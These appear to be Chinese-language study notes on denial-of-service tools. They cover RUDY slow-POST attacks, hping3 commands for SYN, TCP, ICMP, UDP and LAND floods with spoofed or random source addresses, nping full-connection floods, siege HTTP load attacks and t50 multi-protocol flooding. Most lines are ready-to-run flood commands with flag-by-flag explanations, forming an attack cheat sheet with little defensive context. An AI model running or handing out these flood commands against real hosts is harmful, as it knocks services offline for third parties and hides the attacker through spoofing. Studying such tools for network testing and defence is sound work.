RUDY(ARE YOU DEAD YET)
慢速应用层HTTP POST攻击,与slowhttptest原理相同
每次只传输一个字节的数据(很极致)
攻击有表单WEB页面,攻击时需要指定攻击的参数名称
Hping3
几乎可以定制发送任何TCP/IP数据包,用于测试FW、端口扫描、性能测试
Syn Flood攻击
攻击者消耗大量资源
hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1
hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1
TCP Flood攻击
拼资源
hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 ()
-c count计数
-d data数据段多大
-S 发的是TCP的flag位是SYN
-w window的大小,默认64
-p 目标端口
--flood 以flood的方式发
--rand-source 随机伪造源地址
-P flag位为PUSH
-U flag位为URG
-SARFUP flag位很多
ICMP Flood攻击
hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2
-q 安静模式
-n 不解析域名
-a 伪造源地址为
UDP Flood攻击
hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2
LAND攻击
特殊种类的SYN Flood攻击
源地址、目的地址都是受害者、表示受害者自己完成三次握手,左右互搏自己打自己
hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1
windows会打的很慢。unix可能会挂。
TCP全链接DoS攻击
nping 包含在nmap软件包里
nping --tcp-connect --rate=10000 -c 1000000000 -q 1.1.1.1
查公网IP
nping --echo-client "public" echo.nmap.org --udp
Siege
http/https压力测试工具,模拟多个用户并发访问请求
扫描banner(也可以不写http/https)
siege -g http://1.1.1.1/a.php
DoS
siege -i -c 1000 网址 -A 任意字符
-c 连接数
-A 指定user-agent,默认会带一个siege字符
-i 模拟用户随机点击
同时访问多个URL
默认的/usr/siege/urls.txt
通过 -f 来调用
T50 网络压力测试
t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80
t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22